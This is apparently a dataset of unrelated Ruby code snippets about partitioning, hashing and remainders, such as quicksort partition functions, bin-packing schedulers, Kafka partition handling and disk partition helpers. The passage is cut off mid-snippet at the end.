"def partition(ia, left, h)\n piv = ia[h] #choose the pivot as the furthest value\n i = left - 1 #set i to the index of the lowest value\n temp = 0 #temporary swapping variable\n\n for j in left..(h-1) #for j goes from low to high index..\n if(ia[j] < piv) #if the current value that we are looking at is les than the pivot...\n i += 1 #add one to the lowest position counter...\n\n #swap those two values\n ia[i],ia[j] = ia[j],ia[i]\n\tend\n end\n #swap so partition is in the middle\n ia[i+1],ia[h] = ia[h],ia[i+1]\n\n return (i+1)\nend",
"def update!(**args)\n @partition_key = args[:partition_key] if args.key?(:partition_key)\n end",
"def __remainder=(v) # only keep relevant bits of the remainder\n if v != 0\n num_bits = self.class.type.size * 8\n num_used_bits = self.class.map.value.collect { |v, _, _| v }.select { |v| v > 0 }.sum(:+)\n if num_used_bits < num_bits\n v &= ((( 1 << (num_bits - num_used_bits)) - 1) << num_used_bits)\n else\n v = 0\n end\n end\n @__remainder = v\n end",
"def update!(**args)\n @partition_count = args[:partition_count] if args.key?(:partition_count)\n end",
"def partition(arr, left, right, pivot)\n pivot_val = arr[pivot]\n arr[pivot] = arr[right]\n arr[right] = pivot_val\n\n storage = left\n\n (left..right-1).each do |i|\n if arr[i] < pivot_val\n storage_val = arr[storage]\n arr[storage] = arr[i]\n arr[i] = storage_val\n storage += 1\n end\n end\n\n storage_val = arr[storage]\n arr[storage] = arr[right]\n arr[right] = storage_val\n\n storage\nend",
"def on_partitions_assigned(_, partitions)\n @assigned_partitions = partitions.to_h.transform_values { |part| part.map(&:partition) }\n @changed = true\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def partition(cluster_hash)\n data = {}\n h1 = {}\n cluster_hash.sort.to_h.each { |_num2, h2|\n h2.each_key{ |k|\n h1[k] = []\n cluster_hash.sort.to_h.each { |num3, h3|\n if h1[k].map {|e| e['value']}.include?(h3[k])\n num = (h1[k].select { |e| e['value'] == h3[k] }).first['num']\n h1[k].delete_if { |e| e['value'] == h3[k] }\n h1[k] += [{ 'num' => num + num3, 'value' => h3[k], 'cell' => \"#{G5K.nodeset(num + num3)}: #{h3[k]}\", 'sort' => \"#{h3[k]}\"}]\n else\n h1[k] += [{ 'num' => num3, 'value' => h3[k], 'cell' => \"#{G5K.nodeset(num3)}: #{h3[k]}\", 'sort' => \"#{h3[k]}\"}]\n end\n }\n h1[k].first['cell'] = h1[k].first['cell'].split(': ')[1] if h1[k].count == 1\n data[k] = h1[k].sort_by{ |e| e['num'].sort[0] }\n }\n }\n data\nend",
"def partition_private(leftmost_index, rightmost_index)\n i = leftmost_index + 1\n pivot = self[leftmost_index] # the pivot can be chosen a number of different ways\n j = i\n while j <= rightmost_index\n # if the value is less than the pivot value, go search\n if self[j] < pivot\n self[i], self[j] = self[j], self[i]\n i += 1\n end\n j += 1\n end\n # puts the pivot into the correctly sorted area\n self[leftmost_index], self[i - 1] = self[i - 1], self[leftmost_index]\n i - 1\n end",
"def rehash() end",
"def greedy1_initial!(remaining_partitions)\n # Initialize\n site_list = remaining_partitions.sites\n site_index = 0\n partition_index = 0\n total_sites_remaining = remaining_partitions.total_sites\n\n\n total_free_space = self.total_free_space\n\n # Fill each bin starting with the least filled\n self.each_with_index do |bin, bin_index|\n\n # How many sites need to go into the current bin\n sites_for_bin = ((@operations_lower_bound - bin.size).to_f / total_free_space * total_sites_remaining).floor\n\n # Pick (random) site of partition, add to bin and drop from \"remaining_partitions\"\n dropped_partition = remaining_partitions.list.values[partition_index].drop_random_site!\n bin.add!([dropped_partition])\n\n # Do we need to fill two partitions in this bin?\n if site_list[site_index].values.first != site_list[site_index + sites_for_bin - 1].values.first\n partition_index += 1\n\n # Pick (random) site of partition, add to bin and drop from \"remaining_partitions\"\n dropped_partition = remaining_partitions.list.values[partition_index].drop_random_site!\n bin.add!([dropped_partition])\n\n elsif bin_index < @list.size - 1 # Prevent index out of bound\n # Is there a partition switch directly at the beginning of the next bin?\n if site_list[site_index + sites_for_bin - 1].values.first != site_list[site_index + sites_for_bin].values.first\n partition_index += 1\n end\n end\n\n site_index += sites_for_bin\n end\n\n remaining_partitions\n end",
"def partition(a,p,r)\n i = p-1\n key = a[r]\n for j in p..r-1\n if(a[j]<=key)\n i = i + 1\n temp = a[i]\n a[i] = a[j]\n a[j] = temp\n end\n end\n temp = a[i+1]\n a[i+1] = a[r]\n a[r] = temp\n return i+1\nend",
"def greedy1_initial_alt2!(remaining_partitions)\n\n virtual_remaining_partitions = DeepClone.clone remaining_partitions\n\n sites_in_current_partition = 0\n # Fill each bin starting with the least filled\n self.each_with_index do |bin, bin_index|\n\n free_space = (@operations_lower_bound - bin.size)\n\n # condition can be equal since the first remaining partition might be split\n dropped_partitions = if virtual_remaining_partitions.first.op_optimized == free_space || (virtual_remaining_partitions.size == 1 && virtual_remaining_partitions.first.op_optimized <= free_space)\n virtual_remaining_partitions.drop!(1)\n sites_in_current_partition = 0\n elsif virtual_remaining_partitions.first.op_optimized < free_space\n partition = virtual_remaining_partitions.drop!(1).first\n sites_in_current_partition = virtual_remaining_partitions.first.sites.size\n space_per_site = (virtual_remaining_partitions.first.op_optimized / sites_in_current_partition).floor\n [partition,\n virtual_remaining_partitions.drop_sites!(((free_space - partition.op_optimized).to_f/space_per_site).ceil, compute = false)]\n else\n sites_in_current_partition = virtual_remaining_partitions.first.sites.size if sites_in_current_partition == 0\n space_per_site = (virtual_remaining_partitions.first.op_optimized / sites_in_current_partition).floor\n virtual_remaining_partitions.drop_sites!((free_space.to_f/space_per_site).ceil, compute = false)\n end\n\n # Phase 2: Add site in the middle of each partition to the bin\n dropped_partitions.each do |partition|\n # Get site in the middle of partition\n mid_site = partition.sites[partition.sites.size / 2]\n\n # Actual assignment of site\n dropped_partition = remaining_partitions.list[partition.name].drop_specific_site!(mid_site)\n bin.add!([dropped_partition])\n end\n end\n\n remaining_partitions\n end",
"def changepartition(partition, filename)\n\tbaseaddress = PARTITIONS['boot'][START]\t\n\tsize = partition[SIZE]\n\tpartdata = Flashimage.read(filename)\n\tlength = partdata.size\n\tlast = partition[SIZE]\n\traise('Input file too large.') if length + 12 > last\n\tcrc32 = Zlib.crc32(partdata)\n\tpartdata[length ... last - 12] = \"\\xff\" * (last - length - 12)\n\tpartdata[last - 12 ... last] = [length, 0x12345678, crc32].pack('V3')\n\tfilename = \"#{File.dirname(FLASHIMAGE)}/#{partition[FILE]}\"\n\tFlashimage.write(partdata, filename)\nend",
"def partition(a,l,r)\n pivot = a[r]\n i = l\n p_index = l\n\n while i < r\n if a[i] <= pivot\n temp = a[i]\n a[i] = a[p_index]\n a[p_index] = temp\n p_index += 1\n end\n i += 1\n end\n temp = a[p_index]\n a[p_index] = a[r]\n a[r] = temp\n return p_index\nend",
"def greedy2_fill!(remaining_partitions)\n remaining_partitions.each do |src_partition|\n src_partition.sites.each do |site|\n\n smallest_bin = self.update_bin_sizes!.min\n target_partition = smallest_bin.list[src_partition.name]\n if target_partition.nil?\n smallest_bin.add!([Partition.new(src_partition.name, [site], src_partition.tree)])\n else\n target_partition.incr_add_sites!([site])\n end\n\n end\n end\n end",
"def partition(list, left, right, pivotIndex)\n pivotValue = list[pivotIndex]\n list[pivotIndex], list[right] = list[right], list[pivotIndex]\n storeIndex = left\n for i in (left...right) do\n if list[i] < pivotValue\n list[storeIndex], list[i] = list[i], list[storeIndex]\n storeIndex += 1\n end\n end\n list[right], list[storeIndex] = list[storeIndex], list[right]\n storeIndex\nend",
"def update!(**args)\n @per_partition_bytes = args[:per_partition_bytes] if args.key?(:per_partition_bytes)\n @period = args[:period] if args.key?(:period)\n end",
"def lock\n\t\t\tself.instance_eval do \n\t\t\t\tundef :same_piece_count=\n\t\t\t\tundef :difference_ids=\n\t\t\tend\n\t\tend",
"def add!(partition, dirty = false)\n if @list[partition.name].nil?\n @list[partition.name] = partition\n else\n @list[partition.name].merge!(partition, simulate = false, dirty)\n end\n self\n end",
"def add_to_partition(cand, match, partition)\n if !match.nil?\n partition[match] << cand\n @ident_viol_candidates = true\n else\n partition << [cand]\n end\n end",
"def greedy1_initial_alt!(remaining_partitions)\n\n virtual_remaining_partitions = DeepClone.clone remaining_partitions\n\n total_sites_remaining = remaining_partitions.total_sites\n total_free_space = self.total_free_space\n\n # Fill each bin starting with the least filled\n self.each_with_index do |bin, bin_index|\n\n # How many sites need to go into the current virtual bin\n sites_for_bin = ((@operations_lower_bound - bin.size).to_f / total_free_space * total_sites_remaining).ceil\n\n # Get partitions that need to go into the current virtual bin\n dropped_partitions = virtual_remaining_partitions.drop_sites!(sites_for_bin, compute = false)\n\n dropped_partitions.each do |partition|\n # Get site in the middle of partition\n mid_site = partition.sites[partition.sites.size / 2]\n\n # Actual assignment of site\n dropped_partition = remaining_partitions.list[partition.name].drop_specific_site!(mid_site)\n bin.add!([dropped_partition])\n end\n end\n\n remaining_partitions\n end",
"def slice_fill!(remaining_partitions)\n # Total number of sites that need to be distributed\n total_sites_remaining = remaining_partitions.total_sites\n total_free_space = self.total_free_space\n\n # Fill each bin starting with the least filled\n self.each do |bin|\n\n # How many sites need to go into the current bin\n number_of_sites = ((@operations_lower_bound - bin.size).to_f / total_free_space * total_sites_remaining).ceil # FIXME: It's probably better to round down and save overflow in last bin\n\n # Fill \"number_of_sites\" sites taken from \"remaining_partitions\" into the bin. The rest stays in \"remaining_partitions\"\n dropped_partitions = remaining_partitions.drop_sites!(number_of_sites)\n bin.add!(dropped_partitions)\n end\n end",
"def partition(collection, pivot)\n index = 0\n\n while index < pivot\n if collection[index] > collection[pivot]\n temp = collection[index]\n collection = shift(index, pivot, collection)\n collection[pivot] = temp\n pivot -= 1\n next\n end\n index += 1\n end\nend",
"def remainder_hash!(hash, *keys)\n keys = gather_keys(*keys)\n hash = normalize_hash(hash) unless hash.class == ::Hash\n hash.slice!(*keys)\n end",
"def randomized_partition(arr, p, r, ord)\n\ti = rand(p...r)\n\ttemp = arr[i]\n\tarr[i] = arr[r]\n\tarr[r] = temp\n\tpartition(arr, p, r, ord)\nend",
"def divmod(p0) end",
"def partition(array, p, r)\n q = p\n (p .. r - 1).each do |u|\n if array[u] <= array[r]\n array[q], array[u] = array[u], array[q]\n q += 1\n end\n end\n array[q], array[r] = array[r], array[q]\n q\nend",
"def original_scheduling_initial!(partitions)\n # Phase 1: Sort partitions by sites.size\n partitions.sort_by_sites!\n\n # Phase 2: Initial filling\n bin_assigner = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_assigner].total_sites + partitions.first.sites.size <= @sites_lower_bound\n @list[bin_assigner].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_assigner].total_sites == @sites_lower_bound\n full_bins += 1\n @sites_lower_bound -= 1 if full_bins == @list.size - @sites_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_assigner = (bin_assigner + 1) % @list.size\n end\n partitions\n end",
"def partition(arr, left, right)\r\n pivot = arr[right]['id']\r\n brk_pt = left\r\n\r\n (left..right-1).each do |i|\r\n if arr[i]['id'] < pivot\r\n arr[i], arr[brk_pt] = arr[brk_pt], arr[i]\r\n brk_pt = brk_pt + 1\r\n end\r\n end\r\n\r\n arr[brk_pt], arr[right] = arr[right], arr[brk_pt]\r\n return brk_pt\r\nend",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def remainder(p0) end",
"def partition(a, p, r)\n\n\t# assume last position\n\tpivot = a[r]\n\ti = p-1\n\tp.upto(r-1) do |j|\n\t\tif a[j] <= pivot\n\t\t\ti+=1\n\t\t\ta[i], a[j] = a[j], a[i]\n\t\tend \n\tend\n\ta[i+1],a[r] = a[r],a[i+1]\n i+1\nend",
"def partition_list()\nend",
"def partitioned_state\n super\n end",
"def assign_parts(hash={})\n return if hash.nil? or hash == {}\n self.parts = []\n hash ||= {}\n hash.each do |h|\n i = self.vendor.items.visible.find_by_sku(h[:sku])\n if i then\n i.is_part = true\n i.part_quantity = self.string_to_float(h[:part_quantity])\n result = i.save\n if result == false\n raise \"Could not save Item because #{ i.errors.messages }\"\n end\n self.parts << i\n end\n end\n result = self.save\n if result == false\n raise \"Could not save Item because #{ self.errors.messages }\"\n end\n end",
"def modulus(v)\n @modulus = v\n end",
"def add data, offset\n next_frag = 0\n $LOG.debug \"Setting partition at offset \" + offset.to_s + \" To \" + data\n len = data.length\n\n # can we fit it in??\n # lets say no. so we have to create a ????? and use that as\n # an enumerator\n #\n\n \n\n dary = [data].pack(\"a*\").unpack(\"C*\")\n @part[offset, dary.length] = dary\n\n @part[(offset + dary.length), 2] = [next_frag].pack(\"n\").unpack(\"C2\")\n \n @rem -= (dary.length + FileSystem::get_link_size)\n end",
"def set(partition, field, value)\n partition = deep_copy(partition)\n value = deep_copy(value)\n AutoinstCommon.set(@fields, partition, field, value)\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def partition_used(partition)\n # Return magic number if in test_mode to prevent syscall\n return '128' if @test_mode\n b = ' ' * 128\n syscall(137, partition, b)\n a = b.unpack('QQQQQ')\n [a[2] * blocks_per_kilobyte, a[4] * blocks_per_kilobyte]\n end",
"def partition_selector\n @subhash = {}\n @filters = {}\n\n partition_selector_hash @selector, []\n end",
"def partition(arr, left, right)\n pivot = arr[right]\n pindex = left\n for i in (left...right) do\n if(arr[i] <= pivot)\n arr[pindex], arr[i] = arr[i], arr[pindex]\n pindex += 1\n end\n end\n arr[pindex], arr[right] = arr[right], arr[pindex]\n pindex\nend",
"def cut_fill!(remaining_partitions)\n # Fill each bin starting with the least filled\n self.each do |bin|\n break if remaining_partitions.empty? # End if all remaining partitions have been distributed already\n\n # Total number of operations that need to go into this bin\n total_operations_remaining = remaining_partitions.op_optimized_size\n total_free_space = self.total_free_space\n\n # How many operations need to go into the current bin\n operations_for_bin = [((@operations_lower_bound - bin.size).to_f / total_free_space * total_operations_remaining).ceil,\n @operations_lower_bound - bin.size].max\n\n # Fill sites that add up to \"operations_for_bin\" taken from \"remaining_partitions\" into the bin.\n # The rest stays in \"remaining_partitions\".\n dropped_partitions = remaining_partitions.drop_operations!(operations_for_bin)\n bin.add!(dropped_partitions)\n end\n end",
"def update!(**args)\n @end_cursor = args[:end_cursor] if args.key?(:end_cursor)\n @partition = args[:partition] if args.key?(:partition)\n @start_cursor = args[:start_cursor] if args.key?(:start_cursor)\n end",
"def modulo(p0) end",
"def rehash(growth_multiple = DEFAULT_GROWTH_MULTIPLE)\n puts \"Rehashing\"\n new_size = (table.length * growth_multiple).to_i\n @table = table.each_with_object(HashTable.new(new_size)) do |value, result|\n result.insert(value) unless value == TOMBSTONE_MARKER\n end.dump_table\n end",
"def calc_poss_partitions(root_partition, rd, md)\n root_partition = normalize_partition(root_partition)\n # puts \"root_partition = \" + root_partition.to_s\n r = rd[:r_num_cells].length\n poss_partitions = Array.new\n # poss_partitions.push(root_partition)\n xxs = create_r_arrays_from_partition(rd[:r_num_cells], root_partition)\n\n i_j_combinations = (0...xxs.length).to_a.combination(2).to_a\n i_j_combinations.each do |ij|\n xx_i_combinations = (1...xxs[ij[0]].length).flat_map{|size| xxs[ij[0]].combination(size).to_a}\n xx_j_combinations = (1...xxs[ij[1]].length).flat_map{|size| xxs[ij[1]].combination(size).to_a}\n xx_i_combinations.each do |xx_i_combination|\n xx_i_sum = xx_i_combination.inject(0, :+)\n xx_j_combinations.each do |xx_j_combination|\n xx_j_sum = xx_j_combination.inject(0, :+)\n # This part is horribly inefficient. I already know some ways\n # it could be improved, but I just want a proof of concept for\n # the time being, so maybe I'll come back and optimize later.\n if xx_i_sum == xx_j_sum\n new_partition = create_new_partition(root_partition, xx_i_combination, xx_j_combination)\n new_partition = normalize_partition(new_partition)\n # Originally, I had this part cut down the number of partitions it returned by\n # making it only return VALID partitions. Now that I'm essentially using this\n # as a method of EXPANDING from a given partition, I should allow it to return\n # invalid partitions, as they could still have valid children which would not\n # be reachable otherwise.\n # if (not poss_partitions.include? new_partition) and validate_partition(new_partition, rd, md)\n if not poss_partitions.include? new_partition\n poss_partitions.push(new_partition)\n # puts \"poss_partition[\" + (poss_partitions.length-1).to_s + \"] = \" + new_partition.to_s\n end\n end\n end\n end\n end\n return poss_partitions\nend",
"def problem_76\n return 100.partitions - 1\nend",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def partition( header, &block )\n data.partition( header, &block ).map { |d| dup.load( d ) }\n end",
"def adapted_scheduling_initial!(partitions)\n bin_index = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_index].size + partitions.first.size <= @operations_lower_bound\n @list[bin_index].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_index].size == @operations_lower_bound\n full_bins += 1\n @operations_lower_bound -= 1 if full_bins == @list.size - @operations_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_index = (bin_index + 1) % @list.size\n end\n @list = @list.sort\n\n partitions\n end",
"def greedy1_initial_alt3!(remaining_partitions)\n bin_index = 0\n virtual_size = 0\n remaining_partitions.each do |partition|\n average_site_size = partition.size / partition.sites.size\n z = 0\n while z < partition.sites.size && bin_index < @list.size\n # Number of sites of this partition to go in bin bin_index\n z_prime = [((@operations_lower_bound - @list[bin_index].size - virtual_size).to_f/average_site_size).ceil,\n partition.sites.size - z].min\n\n # Assign site to bin\n mid_site = partition.sites[z + z_prime / 2]\n dropped_partition = partition.drop_specific_site!(mid_site)\n @list[bin_index].add!([dropped_partition])\n\n # -1 because we dropped one site, so the index z is also -1\n z += z_prime - 1\n if z >= partition.sites.size\n virtual_size = z_prime * average_site_size - @operations_worst_case\n else\n virtual_size = 0\n bin_index += 1\n end\n end\n end\n remaining_partitions\n end",
"def move_random_partition(node, histogram)\n #pick a random partition\n partition = node[:partitions].sample \n raise \"failed to find partition\" unless partition\n move_partition_to_most_utilised_node_with_space_for_it(node, partition, histogram)\n end",
"def div_h_p_nr(a,b)\n p = 0\n\n @bits.times do\n if p < 0\n # (i-a) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-a) p=p+b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p += b\n else\n # (i-b) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-b) p=p-b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p -= b\n if (p < 0)\n# Tests pass if the following is uncommented\n# # (iv) restore p\n# p += b\n else\n # (iii) if p >= 0\n a |= 1\n end\n end\n end\n # FIXME - need a test case that exercises this last step\n if p < 0\n p += b\n end\n [lo(a),lo(p)]\n end",
"def partition_hash(hash, *keys)\n keys = gather_keys(*keys)\n hash = normalize_hash(hash)\n return (matched = hash.slice(*keys)), hash.except(*matched.keys)\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def test_0260_partition\n @@log.debug \"test_0260_partition starts\" if @@log.debug?\n assert_respond_to(@list, :partition, \"test_0260_partition_respond\")\n # Basic partition\n ta = @list.partition {|obj| obj.ndata >= 3 }\n assert_equal(2, ta.size,\"test_0260_partition_basic_01\")\n # First array: block evaluated to true\n assert_equal([@aen, @bsb], ta[0], \"test_0260_partition_basic_02\")\n # Second array: block evaluated to false\n assert_equal([@cab, @dad], ta[1], \"test_0260_partition_basic_03\")\n # Check Enumerator or Enumerable::Enumerator return, no block given\n # This form not documented by the 1.8 Pickaxe.\n new_list = @list.partition\nif RUBY_VERSION >= \"1.9\"\n result = new_list.is_a? Enumerator\n assert(result, \"test_0260_partition_enumcheck\")\nelse\n # Note: the author's version of the 1.8 Pickaxe documents this\n # as an Array, however does not document this form of code at all.\n # YMMV.\n result = new_list.is_a? Enumerable::Enumerator\n assert(result, \"test_0260_partition_enumenumcheck\")\nend\n\n @@log.debug \"test_0260_partition ends\" if @@log.debug?\n end",
"def set_remainder\n @remainder = Remainder.find(params[:id])\n end",
"def partitions(key, partitions)\n master = fnv_hash(key) % partitions.size\n selected = [master]\n nodes = [partitions[master]]\n current = (master + 1) % partitions.size\n\n # Walk clockwise around the ring of partitions, starting from the master partition.\n # The next few unique nodes in ring order are the replicas.\n while current != master && selected.size < @replicas\n if !nodes.include? partitions[current]\n nodes << partitions[current]\n selected << current\n end\n current = (current + 1) % partitions.size\n end\n\n selected\n end",
"def partition(arr, start, e)\n pivot = arr[e - 1]\n p_index = i = start\n \n while i < e - 1\n if arr[i] < pivot\n arr[i], arr[p_index] = arr[p_index], arr[i]\n p_index += 1\n end\n i += 1\n end\n arr[p_index], arr[e - 1] = arr[e - 1], arr[p_index]\n p_index\nend",
"def update_hash\n nh = nil\n\n if is_branch != 0\n sha512 = OpenSSL::Digest::SHA512.new\n sha512 << HASH_+PREFIXES[:inner_node]\n hashes.each { |k,h|\n sha512 << v\n }\n nh = sha512.digest\n end\n\n return false if nh == self.hash\n self.hash = nh\n return true\n end",
"def block_by_hash(_hsh)\n raise NotImplementedError\n end",
"def partition(list, left, right)\n pivot = list[right]\n previous_left = left-1\n left.upto(right-1) { |value|\n previous_left = previous_left + 1 if list[value] <= pivot\n list[previous_left], list[value] = list[value], list[previous_left] if list[value] <= pivot\n }\n list[previous_left+1], list[right] = list[right], list[previous_left+1]\n return previous_left + 1\nend",
"def partition_lookup\n return @partition_lookup unless @partition_lookup.nil?\n io = _root._io\n _pos = io.pos\n io.seek(_root.sector_size)\n @_raw_partition_lookup = io.read_bytes(sector_size)\n _io__raw_partition_lookup = Kaitai::Struct::Stream.new(@_raw_partition_lookup)\n @partition_lookup = PartitionEntry.new(_io__raw_partition_lookup, self, @_root)\n io.seek(_pos)\n @partition_lookup\n end",
"def hash_values\n [@modulus, @remainder]\n end",
"def partition(array, low, high)\n middle = (high + low ) / 2\n pivot = array[middle] # choose middle element as pivot\n # SWAP MIDDLE TO END\n array[middle], array[high] = array[high], array[middle]\n\n pivot_index = high # store index of pivot\n i = low\n\n while i < pivot_index\n if array[i] <= pivot\n i += 1\n next\n end\n\n before_pivot = pivot_index - 1\n array[i], array[before_pivot] = array[before_pivot], array[i]\n pivot_index -= 1\n end\n # SWAP ONCE AT END OF LOOP TO PUT PIVOT IN CORRECT LOCATION\n array[pivot_index], array[high] = array[high], array[pivot_index]\n pivot_index\nend",
"def generate_partitioner(graph,partitioners,numReduceTask)\r\n \r\n puts\"--- PARTITIONER ---\" \r\n \r\n @Jobs.each do |current_job| \r\n \r\n if partitioners.size == 0\r\n return\r\n end\r\n \r\n numReduceTask_int = 1 # valore di default\r\n \r\n unless numReduceTask.size == 0\r\n numReduceTask.each do |inline|\r\n \r\n fields = inline.split('.')\r\n if current_job == fields[0] #se viene definito un setNumTask per qul job\r\n numReduceTask_int = fields[1].scan(/\\d+/)\r\n numReduceTask_int = numReduceTask_int.first.to_i\r\n else\r\n next\r\n end\r\n end \r\n \r\n if numReduceTask_int == 0 # viene imposto che non ci sará il reducer\r\n next # passo al prossimo ciclo di job\r\n end \r\n end \r\n\r\n fields = partitioners.first.split('.')\r\n \r\n # se il job da analizzare é uguale a quello corrente => lo lavoro\r\n if current_job == fields[0] \r\n partitioner_name = current_job + \".\" + \"PARTITIONER_\" + fields[1].split('(')[1]\r\n \r\n #aggiungo il nodo partitioner\r\n graph.add_node(partitioner_name,\"is_partitioner\")\r\n puts \"aggiunto partitioner:\" + partitioner_name\r\n \r\n # chiudo i nodi pendenti ( job per job) \r\n Close_ALL_pending_links(graph,current_job,partitioner_name)\r\n \r\n for i in(1..numReduceTask_int)\r\n @OpenLink.push(partitioner_name); \r\n end \r\n end \r\n end #do jobs\r\n \r\n end",
"def hashfunction(key, size)\n #key.hash % size\n key % size\n end",
"def set_partition_usage(host, partition, usage)\n self.client.set(\"gh.storage.server.usage.percent.#{host}.#{partition}\", usage.to_s)\n end",
"def dispatch_hashing!\n Thread::new do\n begin\n self.logger.debug { \"Starting hashset dispatcher.\" }\n \n data = true\n position = @options.offset * @options.blocksize\n \n if @options.blockcount\n target = position + @options.blockcount * @options.blocksize\n else\n target = nil\n end\n \n self.logger.info { \"Starting indexing for transfer.\" }\n \n while data and (target.nil? or position < target)\n self.file.acquire do |file|\n self.logger.debug { \"Reading block from position #{position}.\" }\n file.seek(position)\n data = file.read(@options.blocksize)\n end\n \n position += @options.blocksize\n @hash_queue << Digest::SHA1.hexdigest(data) if data\n end\n \n # indicates finish\n @hash_queue << :end\n \n self.logger.info { \"Indexing for transfer finished.\" }\n \n rescue Exception => e\n self.logger.fatal { \"#{e.class.name}: #{e.message}\\n #{e.backtrace.join(\"\\n\")}\" }\n end\n end\n end",
"def partition(node)\n\t\tnew_head = node\n\t\tnew_tail = node\n\t\tcurr_node = @head\n\t\twhile curr_node\n\t\t\tp curr_node.val \n\t\t\ttemp_next = curr_node.next_node #***\n\t\t\tif curr_node.val < node.val\n\t\t\t\tcurr_node.next_node = new_head\n\t\t\t\tnew_head = curr_node\n\t\t\telse\n\t\t\t\tnew_tail.next_node = curr_node\n\t\t\t\tnew_tail = curr_node\n\t\t\t\tcurr_node.next_node = nil\n\t\t\tend\n\t\t\tcurr_node = temp_next\n\t\tend\n\t\t@head = new_head\n\tend",
"def set_pie_piece_transaction_split\n @pie_piece_transaction_split = PiePieceTransactionSplit.find(params[:id])\n end",
"def partition1(arr, left, right)\n pele = arr[left]\n pindex = right\n i = right\n while(i > left)\n if(arr[i] > pele)\n arr[i], arr[pindex] = arr[pindex], arr[i]\n pindex -= 1\n end\n i -= 1\n end\n arr[left], arr[pindex] = arr[pindex], arr[left]\n pindex\nend",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def modulo(other)\n self % other\n end",
"def partition_linked_list(linked_list, partition_value)\n test_node = linked_list.head.next\n until test_node.next.value == nil\n if test_node.value < partition_value\n next_node = test_node.next\n linked_list.prepend(test_node.value)\n linked_list.remove(test_node)\n test_node = next_node\n else\n test_node = test_node.next\n end\n end\n linked_list\nend",
"def add_partition_to_all_lowest( tp, nb_partitions_to_add )\n\n nodes_sizes_replicas = @nodes_lists_replicas.hmap { |k,v| { k => v.size } }\n nodes_lowest = nodes_sizes_replicas.sort_by{|k,v| v}.map { |a| a[0] }\n\n nodes_lowest.each do |node|\n break if nb_partitions_to_add <= 0\n\n unless @nodes_lists_replicas[node].has_key?(tp)\n add_partition_to_node( tp, node )\n nb_partitions_to_add -= 1\n end\n end\n end",
"def partition(array, left, right)\n pivot = right\n right -= 1\n puts \"left: #{left}, right: #{right}\"\n while true do\n while array[left] <= array[pivot] && left < pivot do\n left += 1\n end\n\n while array[right] > array[pivot] do\n right -= 1\n end\n\n\n\n if left >= right\n temp = array[left]\n array[left] = array[pivot]\n array[pivot] = temp\n break\n else\n temp = array[left]\n array[left] = array[right]\n array[right] = temp\n end\n end\n\n\n left\nend",
"def partitionx(array, start, fin, pivot_index)\n le_count = 0\n pivot_value = array[pivot_index]\n puts \"Partitioning for value: #{pivot_value}: #{array}\"\n puts \"Start:Fin #{start}:: #{fin}:: #{pivot_index}\"\n array[start..fin].each do |element|\n le_count += 1 if element <= pivot_value\n end\n\n new_array = []\n puts \"LE count: #{le_count}\"\n new_array[le_count - 1] = pivot_value\n left_index = 0 # 5\n right_index = le_count # 1\n index = start\n array[start..fin].each do |element|\n puts \"Element: #{element}: #{index}:: #{pivot_index}\"\n if index == pivot_index\n index += 1\n next\n end\n\n if element <= pivot_value\n puts \"Copying to left #{element} to #{left_index}\"\n new_array[left_index] = element\n left_index += 1\n else\n puts \"Copying #{element} to #{right_index}\"\n new_array[right_index] = element\n right_index += 1\n end\n end\n puts \"before replacing: #{array} : #{array[start..fin]}:: #{new_array}\"\n j = 0\n (start..fin).each do |index|\n puts \"index: #{index}\"\n array[index] = new_array[j]\n j += 1\n end\n\n puts \"New array: #{array}\"\n puts \"new pivot index: #{array.index(pivot_value)}\"\n array.index(pivot_value)\n end",
"def remainder(val); end",
"def greedy1_fill!(remaining_partitions)\n remaining_partitions.each do |src_partition|\n # Test each site ...\n src_partition.sites.each do |site|\n\n simulation_result_below_bound = {}\n simulation_result_above_bound = {}\n # ... in each bin ...\n self.each_with_index do |bin, bin_index|\n target_partition = bin.list[src_partition.name]\n if target_partition.nil?\n # Creating a new partition is more costly than the worst case\n operations = @operations_worst_case + 1\n else\n # Simulate insertion of site into existing partition of current bin\n operations = target_partition.incr_add_sites!([site], simulate = true)\n end\n # Check if bin.size is smaller than lower_bound. Save simulation_result accordingly to prefer addition below lower_bound.\n if bin.update_size!.size < @operations_lower_bound\n simulation_result_below_bound.merge!({operations => bin_index})\n else\n simulation_result_above_bound.merge!({operations => bin_index})\n end\n\n end\n\n # Insert at lowest operation cost\n best = if simulation_result_below_bound.empty?\n simulation_result_above_bound.min_by { |operations, bin_index| operations }\n else\n simulation_result_below_bound.min_by { |operations, bin_index| operations }\n end\n target_partition = @list[best[1]].list[src_partition.name]\n if 